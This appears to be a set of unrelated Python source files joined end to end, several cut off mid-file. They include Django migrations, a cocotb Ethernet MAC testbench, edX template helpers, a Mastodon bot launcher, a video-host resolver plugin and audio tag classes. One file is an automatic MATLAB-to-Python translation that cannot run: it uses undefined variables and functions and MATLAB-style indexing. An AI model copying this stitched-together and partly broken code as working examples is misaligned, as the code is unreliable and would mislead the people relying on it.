monkeypatch, container_title, issn, citeproc): """ Some fields may be empty, namely those with a direct get call """ keys = ['abstract', 'issue', 'publisher', 'page', 'volume'] for k in keys: del citeproc[k] r = self.test_class._get_oairecord_data(citeproc) keys = ['description', 'issue', 'publisher_name', 'pages', 'volume'] for k in keys: assert r[k] == '' @pytest.mark.parametrize('orcid, expected', [({'ORCID' : '0000-0001-8187-9704'}, '0000-0001-8187-9704'), ({'ORCID' : '0000-0001-8187-9705'}, None), ({}, None)]) def test_get_orcid(self, orcid, expected): """ Must be valid or None """ assert self.test_class._get_orcid(orcid) == expected def test_get_orcids(self, orcids, citeproc): """ Must have the same length as citeproc['author'] and identical to list of orcid """ r = self.test_class._get_orcids(citeproc) assert len(r) == len(citeproc.get('author')) assert r == orcids def test_get_orcid_no_authors(self, citeproc): """ Must rais exception """ del citeproc['author'] with pytest.raises(CiteprocAuthorError): self.test_class._get_orcids(citeproc) def test_get_paper_data(self, affiliations, orcids, title, citeproc): """ We do some assertions on the results, but relatively lax, as we test the called functions, too """ r = self.test_class._get_paper_data(citeproc) assert r['affiliations'] == affiliations for a in r['author_names']: assert isinstance(a, BareName) assert r['orcids'] == orcids assert r['pubdate'] == date(*citeproc['issued']['date-parts'][0]) assert r['title'] == title @pytest.mark.parametrize('doi', [True, False]) @pytest.mark.parametrize('license', [True, False]) def test_get_pdf_url(self, monkeypatch, doi, license): """ Must return true
# Copyright 2020 The Pigweed Authors # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the Licens
e. You may obtain a copy of # the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under
the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. """Runs the main function in detokenize.py.""" from pw_tokenizer import detokenize detokenize.main()
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [("migrations", "0002_second")] operations = [ migrations.CreateModel( "OtherAuthor", [ ("id", models.AutoField(primary_key=True)), ("name", models.CharField(max_length=255)), ("slug", mode
ls.SlugField(null=True)), ("age", models.IntegerField(default
=0)), ("silly_field", models.BooleanField(default=False)), ], ), ]
#!/usr/bin/env python3 import os, sys, signal, argparse, configparser, traceback, time from contextlib import closing from ananas import PineappleBot import ananas.default # Add the cwd to the module search path so that we can load user bot classes sys.path.append(os.getcwd()) bots = [] def shutdown_all(signum, frame): for bot in bots: if bot.state == PineappleBot.RUNNING: bot.shutdown() sys.exit("Shutdown complete") def main(): parser = argparse.ArgumentParser(description="Pineapple command line interface.", prog="ananas") parser.add_argument("config", help="A cfg file to read bot configuration from.") parser.add_argument("-v", "--verbose", action="store_true", help="Log more extensive messages for e.g. debugging purposes.") parser.add_argument("-i", "--interactive", action="store_true", help="Use interactive prompts for e.g. mastodon login") args = parser.parse_args() prog = sys.argv[0] cfg = configparser.ConfigParser() try: cfg.read(args.config) except FileNotFoundError: sys.exit("Couldn't open '{}', exiting.".format(args.config)) for bot in cfg: if bot == "DEFAULT": continue if not "class" in cfg[bot]: print("{}: no class specified, skipping {}.".format(prog, bot)) continue botclass = cfg[bot]["class"] module, _, botclass = botclass.rpartition(".") if module == "": print("{}: no module given in class name '{}', skipping {}.".format(prog, botclass, bot)) try: exec("f
rom {0} import {1}; bots.append({1}('{2}', name='{3}', interactive={4}, verbose={5}))" .format(module, botclass, args.config, bot, args.interactive, args.verbose)) except ModuleNotFoundError as e: print("{}: encountered the following error loading module {}:".format(pro
g, module)) print("{}: the error was: {}".format(prog, e)) print("{}: skipping {}!".format(prog, bot)) continue except Exception as e: print("{}: fatal exception loading bot {}: {}\n{}".format(prog, bot, repr(e), traceback.format_exc())) continue except KeyboardInterrupt: sys.exit() signal.signal(signal.SIGINT, shutdown_all) signal.signal(signal.SIGABRT, shutdown_all) signal.signal(signal.SIGTERM, shutdown_all) try: while(True): time.sleep(60) except KeyboardInterrupt: shutdown_all(None, None) if __name__ == "__main__": main()
#!/usr/bin/env python """ Copyright (c) 2020 Alex Forencich Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import itertools import logging import os import cocotb_test.simulator import cocotb from cocotb.clock import Clock from cocotb.triggers import RisingEdge from cocotb.regression import TestFactory from cocotbext.eth import GmiiFrame, GmiiPhy from cocotbext.axi import AxiStreamBus, AxiStreamSource, AxiStreamSink class TB: def __init__(self, dut, speed=1000e6): self.dut = dut self.log = logging.getLogger("cocotb.tb") self.log.setLev
el(logging.DEBUG) cocotb.start_soon(Clock(dut.gtx_clk, 8, units="ns").start()) cocotb.start_soon(Clock(dut.logic_clk, 8, units="ns").start()) self.gmii_phy = GmiiPhy(dut.gmii_txd, dut.gmii
_tx_er, dut.gmii_tx_en, dut.mii_tx_clk, dut.gmii_tx_clk, dut.gmii_rxd, dut.gmii_rx_er, dut.gmii_rx_dv, dut.gmii_rx_clk, speed=speed) self.axis_source = AxiStreamSource(AxiStreamBus.from_prefix(dut, "tx_axis"), dut.logic_clk, dut.logic_rst) self.axis_sink = AxiStreamSink(AxiStreamBus.from_prefix(dut, "rx_axis"), dut.logic_clk, dut.logic_rst) dut.ifg_delay.setimmediatevalue(0) async def reset(self): self.dut.gtx_rst.setimmediatevalue(0) self.dut.logic_rst.setimmediatevalue(0) await RisingEdge(self.dut.tx_clk) await RisingEdge(self.dut.tx_clk) self.dut.gtx_rst <= 1 self.dut.logic_rst <= 1 await RisingEdge(self.dut.tx_clk) await RisingEdge(self.dut.tx_clk) self.dut.gtx_rst <= 0 self.dut.logic_rst <= 0 await RisingEdge(self.dut.tx_clk) await RisingEdge(self.dut.tx_clk) def set_speed(self, speed): pass async def run_test_rx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6): tb = TB(dut, speed) tb.gmii_phy.rx.ifg = ifg tb.dut.ifg_delay <= ifg tb.set_speed(speed) await tb.reset() for k in range(100): await RisingEdge(dut.rx_clk) if speed == 10e6: assert dut.speed == 0 elif speed == 100e6: assert dut.speed == 1 else: assert dut.speed == 2 test_frames = [payload_data(x) for x in payload_lengths()] for test_data in test_frames: test_frame = GmiiFrame.from_payload(test_data) await tb.gmii_phy.rx.send(test_frame) for test_data in test_frames: rx_frame = await tb.axis_sink.recv() assert rx_frame.tdata == test_data assert rx_frame.tuser == 0 assert tb.axis_sink.empty() await RisingEdge(dut.rx_clk) await RisingEdge(dut.rx_clk) async def run_test_tx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6): tb = TB(dut, speed) tb.gmii_phy.rx.ifg = ifg tb.dut.ifg_delay <= ifg tb.set_speed(speed) await tb.reset() for k in range(100): await RisingEdge(dut.rx_clk) if speed == 10e6: assert dut.speed == 0 elif speed == 100e6: assert dut.speed == 1 else: assert dut.speed == 2 test_frames = [payload_data(x) for x in payload_lengths()] for test_data in test_frames: await tb.axis_source.send(test_data) for test_data in test_frames: rx_frame = await tb.gmii_phy.tx.recv() assert rx_frame.get_payload() == test_data assert rx_frame.check_fcs() assert rx_frame.error is None assert tb.gmii_phy.tx.empty() await RisingEdge(dut.tx_clk) await RisingEdge(dut.tx_clk) def size_list(): return list(range(60, 128)) + [512, 1514] + [60]*10 def incrementing_payload(length): return bytearray(itertools.islice(itertools.cycle(range(256)), length)) def cycle_en(): return itertools.cycle([0, 0, 0, 1]) if cocotb.SIM_NAME: for test in [run_test_rx, run_test_tx]: factory = TestFactory(test) factory.add_option("payload_lengths", [size_list]) factory.add_option("payload_data", [incrementing_payload]) factory.add_option("ifg", [12]) factory.add_option("speed", [1000e6, 100e6, 10e6]) factory.generate_tests() # cocotb-test tests_dir = os.path.abspath(os.path.dirname(__file__)) rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl')) lib_dir = os.path.abspath(os.path.join(rtl_dir, '..', 'lib')) axis_rtl_dir = os.path.abspath(os.path.join(lib_dir, 'axis', 'rtl')) def test_eth_mac_1g_gmii_fifo(request): dut = "eth_mac_1g_gmii_fifo" module = os.path.splitext(os.path.basename(__file__))[0] toplevel = dut verilog_sources = [ os.path.join(rtl_dir, f"{dut}.v"), os.path.join(rtl_dir, "eth_mac_1g_gmii.v"), os.path.join(rtl_dir, "gmii_phy_if.v"), os.path.join(rtl_dir, "ssio_sdr_in.v"), os.path.join(rtl_dir, "ssio_sdr_out.v"), os.path.join(rtl_dir, "oddr.v"), os.path.join(rtl_dir, "eth_mac_1g.v"), os.path.join(rtl_dir, "axis_gmii_rx.v"), os.path.join(rtl_dir, "axis_gmii_tx.v"), os.path.join(rtl_dir, "lfsr.v"), os.path.join(axis_rtl_dir, "axis_adapter.v"), os.path.join(axis_rtl_dir, "axis_async_fifo.v"), os.path.join(axis_rtl_dir, "axis_async_fifo_adapter.v"), ] parameters = {} parameters['AXIS_DATA_WIDTH'] = 8 parameters['AXIS_KEEP_ENABLE'] = int(parameters['AXIS_DATA_WIDTH'] > 8) parameters['AXIS_KEEP_WIDTH'] = parameters['AXIS_DATA_WIDTH'] // 8 parameters['ENABLE_PADDING'] = 1 parameters['MIN_FRAME_LENGTH'] = 64 parameters['TX_FIFO_DEPTH'] = 16384 parameters['TX_FRAME_FIFO'] = 1 parameters['TX_DROP_OVERSIZE_FRAME'] = parameters['TX_FRAME_FIFO'] parameters['TX_DROP_BAD_FRAME'] = parameters['TX_DROP_OVERSIZE_FRAME'] parameters['TX_DROP_WHEN_FULL'] = 0 parameters['RX_FIFO_DEPTH'] = 16384 parameters['RX_FRAME_FIFO'] = 1 parameters['RX_DROP_OVERSIZE_FRAME'] = parameters['RX_FRAME_FIFO'] parameters['RX_DROP_BAD_FRAME'] = parameters['RX_DROP_OVERSIZE_FRAME'] parameters['RX_DROP_WHEN_FULL'] = parameters['RX_DROP_OVERSIZE_FRAME'] extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()} sim_build = os.path.join(tests_dir, "sim_build", request.node.name.replace('[', '-').replace(']', '')) cocotb_test.simulator.run( python_search=[tests_dir], verilog_sources=verilog_sources, toplevel=toplevel, module=module, parameters=parameters, sim_build=sim_build, extra_env=extra_env, )
# -*- coding: utf-8 -*- from celery import Celery from server import config """ Celery configuration module. """ def make_celery(app): """ Flask integration with celery. Taken from http://flask
.pocoo.org/docs/0.12/patterns/celery/ """ celery = Celery(app.import_name, backend=config.CELERY_RESULT_BACKEND, broker=config.CELERY_BROKER_URL)
celery.conf.update(app.config) TaskBase = celery.Task class ContextTask(TaskBase): abstract = True def __call__(self, *args, **kwargs): with app.app_context(): return TaskBase.__call__(self, *args, **kwargs) celery.Task = ContextTask return celery
# -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2017-09-15 15:28 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('silo', '0029_auto_20170915_0810'), ] operations = [ migrations.RemoveField( model_name='silo', name='
workflowlevel1', ), migrations.AddField( model_name='silo', name='workflowlevel1', field=models.ManyToManyField(blank=True, null=True, to='silo.WorkflowLevel1'), ), migrations.AlterField( model_name='tolauser', name='workflowlevel1', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASC
ADE, to='silo.WorkflowLevel1'), ), migrations.AlterField( model_name='workflowlevel2', name='workflowlevel1', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='silo.WorkflowLevel1'), ), ]
# Copyright (c) 2008 Mikeal Rogers # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from urlparse import urljoin from django.http import HttpResponse from django.template import Context from edxmako import lookup_template from edxmako.request_context import get_template_request_context from django.conf import settings from django.core.urlresolvers import reverse from openedx.core.djangoapps.theming.helpers import get_template_path, is_request_in_themed_site from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers log = logging.getLogger(__name__) def marketing_link(name): """Returns the correct URL for a link to the marketing site depending on if the marketing site is enabled Since the marketing site is enabled by a setting, we have two possible URLs for certain links. This function is to decides which URL should be provided. """ # link_map maps URLs from the marketing site to the old equivalent on # the Django site link_map = settings.MKTG_URL_LINK_MAP enable_mktg_site = configuration_helpers.get_value( 'ENABLE_MKTG_SITE', settings.FEATURES.get('ENABLE_MKTG_SITE', False) ) marketing_urls = configuration_helpers.get_value( 'MKTG_URLS', settings.MKTG_URLS ) if enable_mktg_site and name in marketing_urls: # special case for when we only want the root marketing URL if name == 'ROOT': return marketing_urls.get('ROOT') # Using urljoin here allows us to enable a marketing site and set # a site ROOT, but still specify absolute URLs for other marketing # URLs in the MKTG_URLS setting # e.g. urljoin('http://marketing.com', 'http://open-edx.org/about') >>> 'http://open-edx.org/about' return urljoin(marketing_urls.get('ROOT'), marketing_urls.get(name)) # only link to the old pages when the marketing site isn't on elif not enable_mktg_site and name in link_map: # don't try to reverse disabled marketing links if link_map[name] is not None: return reverse(link_map[name]) else: log.debug("Cannot find corresponding link for name: %s", name) return '#' def is_any_marketing_link_set(names): """ Returns a boolean if any given named marketing links are configured. """ return any(is_marketing_link_set(name) for name in names) def is_marketing_link_set(name): """ Returns a boolean if a given named marketing link is configured. """ enable_mktg_site = configuration_helpers.get_value( 'ENABLE_MKTG_SITE', settings.FEATURES.get('ENABLE_MKTG_SITE', False) ) marketing_urls = configuration_helpers.get_value( 'MKTG_URLS', settings.MKTG_URLS ) if enable_mktg_site: return name in marketing_urls else: return name in settings.MKTG_URL_LINK_MAP def marketing_link_context_processor(request): """ A django context processor to give templates access to marketing URLs Returns a dict whose keys are the marketing link names usable with the marketing_link method (e.g. 'ROOT', 'CONTACT', etc.) prefixed with 'MKTG_URL_' and whose values are the corresponding URLs as computed by the marketing_link method. """ marketing_urls = configuration_helpers.get_value( 'MKTG_URLS', settings.MKTG_URLS ) return dict( [ ("MKTG_URL_" + k, marketing_link(k)) for k in ( settings.MKTG_URL_LINK_MAP.viewkeys() | marketing_urls.viewkeys() ) ] ) def footer_context_processor(request): # pylint: disable=unused-argument """ Checks the site name to determine whether to use the edX.org footer or the Open Source Footer. """ return dict( [ ("IS_REQUEST_IN_MICROSITE", is_request_in_themed_site()) ] ) def render_to_string(template_name, dictionary, context=None, namespace='main', request=None): """ Render a Mako template to as a string. The following values are available to all templates: settings: the django settings object EDX_ROOT_URL: settings.EDX_ROOT_URL marketing_link: The :func:`marketing_link` function is_any_marketing_link_set: The :func:`is_any_marketing_link_set` function is_marketing_link_set: The :func:`is_marketing_link_set` function Arguments: template_name: The name of the template to render. Will be loaded from the template paths specified in configuration. dictionary: A dictionary of variables to insert into the template during rendering. context: A :class:`~django.template.Context` with values to make available to the template. namespace: The Mako namespace to find the named template in. request: The r
equest to use to construct the RequestContext for rendering this template. If not supplied, the current request will be used. """ template_name = get_template_path(template_name) context_instance = Context(dictionary) # add dictionary to context_instance context_instance.update(dictionary or {}) # colla
pse context_instance to a single dictionary for mako context_dictionary = {} context_instance['settings'] = settings context_instance['EDX_ROOT_URL'] = settings.EDX_ROOT_URL context_instance['marketing_link'] = marketing_link context_instance['is_any_marketing_link_set'] = is_any_marketing_link_set context_instance['is_marketing_link_set'] = is_marketing_link_set # In various testing contexts, there might not be a current request context. request_context = get_template_request_context(request) if request_context: for item in request_context: context_dictionary.update(item) for item in context_instance: context_dictionary.update(item) if context: context_dictionary.update(context) # "Fix" CSRF token by evaluating the lazy object KEY_CSRF_TOKENS = ('csrf_token', 'csrf') for key in KEY_CSRF_TOKENS: if key in context_dictionary: context_dictionary[key] = unicode(context_dictionary[key]) # fetch and render template template = lookup_template(namespace, template_name) return template.render_unicode(**context_dictionary) def render_to_response(template_name, dictionary=None, context_instance=None, namespace='main', request=None, **kwargs): """ Returns a HttpResponse whose content is filled with the result of calling lookup.get_template(args[0]).render with the passed arguments. """ dictionary = dictionary or {} return HttpResponse(render_to_string(template_name, dictionary, context_instance, namespace, request), **kwargs)
import random import re import vsphere_inventory as vsphere from os.path import join, dirname try: import json except ImportError: import simplejson as json def readNamesFrom(filepath): with open(filepath) as f: return f.readlines() def randomName(lefts, rights): left = random.choice(lefts).rstrip() right = random.choice(rights).rstrip() return left + '-' + right def nodeExists(knownNames, name): matches = [n for n in knownNames if re.match(name + '(\.|$)', n)] return len(matches) > 0 def generateName(knownNames): leftSides = readNamesFrom(join(dirname(__file__), 'names', 'lefts.txt')) rightSides = readNamesFrom(join(dirname(__file__), 'names', 'rights.txt')) for i in range(10):
name = randomName(leftSides, rightSides) if not nodeExists(knownNames, name): return name else: print('Failed to generate a new, unique, name after 10 attempts') exit(2) if __name__ == '__main__': parser = vsphere.argparser() args = parser.parse_args() vs = vsphere.vsphereConnect(args.server, args.user, args.pa
ssword) vimSession = vsphere.vimLogin(vs) vms = vsphere.vmsAtPath(vs, vimSession, args.path) vmList = [vm['hostname'] for vm in vms] newName = generateName(vmList) print(newName)
# -*- coding: utf-8 -*- # # This file is part of PyGaze - the open-source toolbox for eye tracking # # PyGaze is a Python module for easily creating gaze contingent experiments # or other software (as well as non-gaze contingent experiments/software) # Copyright (C) 2012-2013 Edwin S. Dalmaijer # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License #
along with this program. If not, see <http://www.gnu.org/licenses/> from pygaze.sound import Sound
# Autogenerated with SMOP version 0.23 # main.py ../../assessing-mininet/MATLAB/load_function.m ../../assessing-mininet/MATLAB/process_complete_test_set.m ../../assessing-mininet/MATLAB/process_single_testfile.m ../../assessing-mininet/MATLAB/ProcessAllLogsMain.m from __future__ import division from numpy import arange def strcat(*args): return ''.join(args) def load_octave_decoded_file_as_matrix(file_name): with open(file_name, 'r') as f: return [ map(float,line.strip().split(' ')) for line in f ] def get_test_bitrate(crosstraffic): if crosstraffic: return arange(4,6,0.25) else: return arange(8,12,0.5) def process_complete_test_set(file_names,output_format,crosstraffic): from glob import glob overview_img_file=strcat('overview.',output_format) mean_bitrate=[] std_dev_bitrate=[] mean_delay=[] std_dev_delay=[] mean_jitter=[] std_dev_jitter=[] mean_packetloss=[] std_dev_packetloss=[] print('Starting work on:') print(file_names) for f in file_names: print('in loop, iterating through list of found files...') #current_file_name_with_ext=f #bare_file_name=strrep(current_file_name_with_ext,extension_loadfile,'') #temp_picture_file_name=strcat(bare_file_name,extension_imgfile) current_picture_file_name=strcat(f,'.jpg') matrix_to_process=load_octave_decoded_file_as_matrix(f) parsed_data=process_single_testfile(matrix_to_process,current_picture_file_name,output_format) mean_bitrate[ii]=mean(parsed_data) std_dev_bitrate[ii]=std(parsed_data) mean_delay[ii]=mean(parsed_data[:,2]) std_dev_delay[ii]=std(parsed_data[:,2]) mean_jitter[ii]=mean(parsed_data[:,3]) std_dev_jitter[ii]=std(parsed_data[:,3]) mean_packetloss[ii]=mean(parsed_data[:,4]) std_dev_packetloss[ii]=std(parsed_data[:,4]) bitrate_of_test = get_test_bitrate(crosstraffic) s_bitrate=min(bitrate_of_test) - bitrate_interval e_bitrate=max(bitrate_of_test) + bitrate_interval s_mean_bitrate=min(mean_bitrate) - max(std_dev_bitrate) e_mean_bitrate=max(mean_bitrate) + max(std_dev_bitrate) s_mean_jitter=min(mean_jitter) - max(std_dev_jitter) e_mean_jitter=max(mean_jitter) + max(std_dev_jitter) s_mean_delay=min(mean_delay) - max(std_dev_delay) e_mean_delay=max(mean_delay) + max(std_dev_delay) axis_bitrate=(cat(s_bitrate,e_bitrate,s_mean_bitrate,e_mean_bitrate)) axis_delay=(cat(s_bitrate,e_bitrate,sort(cat(round_(s_mean_delay) - 1,round_(e_mean_delay) + 1)))) axis_jitter=(cat(s_bitrate,e_bitrate,s_mean_jitter,e_mean_jitter)) print('\n\n\n*** START TESTDATA ***\n') print(bitrate_of_test) print(mean_bitrate) print(std_dev_bitrate) print('\n*** END TESTDATA ***\n\n\n') subplot(3,1,1) print(len(bitrate_of_test)) print(len(mean_bitrate)) print(len(std_dev_bitrate)) errorbar(bitrate_of_test,mean_bitrate,std_dev_bitrate,'kx') title('mean throughput with standard deviation') xlabel('test bitrate [Mbps]') ylabel('bitrate value [Mbps]') print(axis_bitrate) axis(axis_bitrate) grid('on') subplot(3,1,2) errorbar(bitrate_of_test,mean_delay,std_dev_delay,'kx') title('mean delay with standard deviation') xlabel('test bitrate [Mbps]') ylabel('delay value [ms]') axis(axis_delay) grid('on') subplot(3,1,3) errorbar(bitrate_of_test,mean_jitter,std_dev_jitter,'kx') title('mean jitter with standard deviation') xlabel('test bitrate [Mbps]') ylabel('jitter value [ms]') axis(axis_jitter) grid('on') aggregatedPicture=figure(1) set_(aggregatedPicture,'PaperUnits','centimeters') set_(aggregatedPicture,'PaperSize',cat(30,16)) set_(aggregatedPicture,'PaperPosition',cat(0,0,30,16)) set_(aggregatedPicture,'PaperOrientation','portrait') saveas(aggregatedPicture,overview_img_file,output_format) close(aggregatedPicture) clear('all') return def process_single_testfile(matrix,current_picture_file_name,output_format): t_start=matrix[1][5] * 3600 + matrix[1][6] * 60 + matrix[1][7] print (matrix[:][5] * 3600 + matrix[:][6] * 60 + matrix[:][7]) t_conv=(matrix[:][5] * 3600 + matrix[:][6] * 60 + matrix[:][7]) - t_start t_start_s=matrix[1][2] * 3600 + matrix[1][3] * 60 + matrix[1][4] t_conv_s=(matrix[:][2] * 3600 + matrix[:][3] * 60 + matrix[:][4]) - t_start_s jj=1 t_int=0 bitrate[jj]=0 delay[jj]=0 jitter[jj]=0 pktloss[jj]=0 for ii in arange(1,len(matrix)).reshape(-1): if (t_conv[ii] - t_int >= 1): jj=jj + 1 t_int=t_conv[ii] bitrate[jj]=matrix[ii][8] delay[jj]=t_conv[ii] - t_conv_s[ii] if (ii > 1): pktloss[jj]=matrix[ii] - matrix[ii - 1] - 1 jitter[jj]=t_conv[ii] - t_conv[ii - 1] else: bitrate[jj]=bitrate[jj] + matrix[ii][8] delay[jj]=mean(cat(delay[jj],(t_conv[ii] - t_conv_s[ii]))) if (ii > 1): pktloss[jj]=pktloss[jj] + matrix[ii] - matrix[ii - 1] - 1 jitter[jj]=mean(cat(jitter[jj],(t_conv[ii] - t_conv[ii - 1]))) bitrate=bitrate / 125000 return_matrix=matlabarray(cat(bitrate.T,delay.T,jitter.T,pktloss.T)) subplot(2,2,1) bitrate_u=copy(bitrate) plot(arange(0,jj - 2),bitrate_u[1:jj - 1],'-') title('Throughput') xlabel('time [s]') ylabel('[Mbps]') axis(cat(0,max(t_conv),0,round_(max(bitrate_u) * 1.125))) grid('on') subplot(2,2,2) plot(arange(0,len(delay) - 1),delay,'-') title('Delay') xlabel('time [s]') ylabel('[ms]') axis(cat(0,max(t_conv),min(delay) - 1e-05,max(delay))) grid('on') subplot(2,2,3) plot(arange(0,len(jitter) - 1),jitter,'-') title('Jitter') xlabel('time [s]') ylabel('[ms]') axis(cat(0,max(t_conv),min(jitter) - max(jitter) * 1.125,max(jitter) * 1.125)) grid('on') subplot(2,2,4) d=diff(t_conv) m=max(d) hist(d) title('Inter-departure time Distribution') xlabel('time [s]') ylabel('Empirical PDF') grid('on') firstPicture=figure(1) set_(firstPicture,'PaperUnits','centimeters') set_(firstPicture,'PaperSize',cat(22,18)) set_(firstPicture,'PaperPosition',cat(0,0,22,18)) set_(firstPicture,'PaperOrientation','portrait') saveas(firstPicture,current_picture_file_name,output_format) close(firstPicture) # if (strcmp(log_type,'udp_rcv')): # subplot(1,1,1) # packetloss_picture=figure(1) # set_(packetloss_picture,'PaperUnits','centimeters') # set_(packetloss_picture,'PaperSize',cat(12,10)) # set_(packetloss_picture,'PaperPosition',cat(0,0,12,10)) # set_(packetloss_picture,'PaperOrientation','portrait') # plot(a
range(0,len(pktloss) - 1),pktloss,'-') # title('Packet loss') # xlabel('time [s]') # ylabel('[pps]') # axis(cat(sort(cat(0,max(t_conv))),sort(cat(round_(max(pktloss)) + 1,round_(min(pktloss)) - 1)))) # grid('on') # saveas(packetloss_picture,strcat('pl_',current_picture_file_name),output_format) # close(packetloss_picture) return return_matrix crosstraffic = False #process_complete_test_set(['/tmp/octave.dat'],'pdf',cros
straffic) process_single_testfile(load_octave_decoded_file_as_matrix('/tmp/octave.dat'),'pic.jpg',"jpg")
""" Plugin for ResolveURL Copyright (C) 2020 gujal This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later ve
rsion. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ from resolveurl.plugins.__resolve_generic__ import ResolveGen
eric from resolveurl.plugins.lib import helpers class OoglyResolver(ResolveGeneric): name = "oogly.io" domains = ['oogly.io'] pattern = r'(?://|\.)(oogly\.io)/(?:embed-)?([0-9a-zA-Z]+)' def get_media_url(self, host, media_id): return helpers.get_media_url(self.get_url(host, media_id), patterns=[r'''file:\s*"(?P<url>[^"]+\.(?:m3u8|mp4))"'''], generic_patterns=False, referer=False) def get_url(self, host, media_id): return self._default_get_url(host, media_id, template='https://{host}/embed-{media_id}.html')
from audio_pipeline.util import Tag import re from audio_pipeline.util import Exceptions class BaseTag(Tag.Tag): def extract(self): super().extract() if self._value is not None: self._value = self._value[0] def set(self, value=Tag.CurrentTag): if value is not Tag.CurrentTag: self.value = value if isinstance(self._value, list): self.mutagen[self.serialization_name] = [str(val) for val in self._value] elif self._value: self.mutagen[self.serialization_name] = [str(self._value)] else: if self.serialization_name in self.mutagen: self.mutagen.pop(self.serialization_name) class NumberTag(Tag.NumberTagMixin, BaseTag): def __init__(self, total_tag, *args): self._total = None self.serialization_total = total_tag super().__init__(*args) def extract(self): # get the number super().extract() if self._value: self._value = int(self._value) # get the total if self.serialization_total in self.mutagen: self._total = int(self.mutagen[self.serialization_total][0]) @property def value(self): if self._value: return self._value @value.setter def value(self, val): if val is None: self._value = None elif isinstance(val, int): self._value = val elif isinstance(val, str) and self._value_match.match(val): # valid-looking num/total string self._value = int(val.split('/')[0]) elif isinstance(val, str): try: self._value = int(val) except ValueError: raise Exceptions.InvalidTagValueError(str(val) + " is not a valid " + self.name) else: raise Exceptions.InvalidTagValueError(str(val) + " is not a valid " + self.name) class DiscNumberTag(NumberTag): def __str__(self): if self._value and self._total: val = str(self._value) + "/" + str(self._total) elif self._value: val = str(self._value) else: val = "" return val class ReleaseDateTag(Tag.ReleaseDateMixin, BaseTag): def __init__(self, *args): super().__init__(*args) self._normalize() class Format(Tag.MetadataFormat): """ A static class used to extract and save Vorbis-formated metadata tags. """ # release-level serialization names _album = "album" _album_artist = "albumartist" _release_date = "date" _label = "label" _mbid = "mbid" _mbid_p = "musicbrainz_albumid" _country = "releasecountry" _release_t
ype = "releasetype" _media_format = "media" # track-level serialization names _title = "title" _artist = "artist" _disc_total = "disctotal" _disc_total_picard = "totaldiscs" _disc_num = "discnumber" _track_total = "tracktotal" _track_total_picard = "totaltracks" _track_num = "tracknumber" _length = "Length" _acoustid = "ACOUSTID_ID" _track_mbid = 'MUSICBRAINZ_RELEASETRACKID' _recording_mbid = 'MUSICBRAINZ_TRACKID' ##############
## # release-level tags ################ @classmethod def album(cls, tags): tag = BaseTag(cls._album_name, cls._album, tags) return tag @classmethod def album_artist(cls, tags): tag = BaseTag(cls._album_artist_name, cls._album_artist, tags) return tag @classmethod def release_date(cls, tags): tag = ReleaseDateTag(cls._release_date_name, cls._release_date, tags) return tag @classmethod def label(cls, tags): tag = BaseTag(cls._label_name, cls._label, tags) return tag @classmethod def mbid(cls, tags): tag = BaseTag(cls._mbid_name, cls._mbid_p, tags) if tag.value is None: tag = BaseTag(cls._mbid_name, cls._mbid, tags) return tag @classmethod def country(cls, tags): tag = BaseTag(cls._country_name, cls._country, tags) return tag @classmethod def release_type(cls, tags): tag = BaseTag(cls._type_name, cls._release_type, tags) return tag @classmethod def media_format(cls, tags): tag = BaseTag(cls._media_format_name, cls._media_format, tags) return tag ###################### # track-level tags ###################### @classmethod def title(cls, tags): tag = BaseTag(cls._title_name, cls._title, tags) return tag @classmethod def artist(cls, tags): tag = BaseTag(cls._artist_name, cls._artist, tags) return tag @classmethod def disc_num(cls, tags): tag = DiscNumberTag(cls._disc_total_picard, cls._disc_num_name, cls._disc_num, tags) if tag.total is None: tag = 